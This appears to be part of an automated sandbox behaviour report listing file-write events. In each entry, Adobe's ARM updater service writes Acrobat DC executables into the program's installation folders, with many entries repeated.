              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
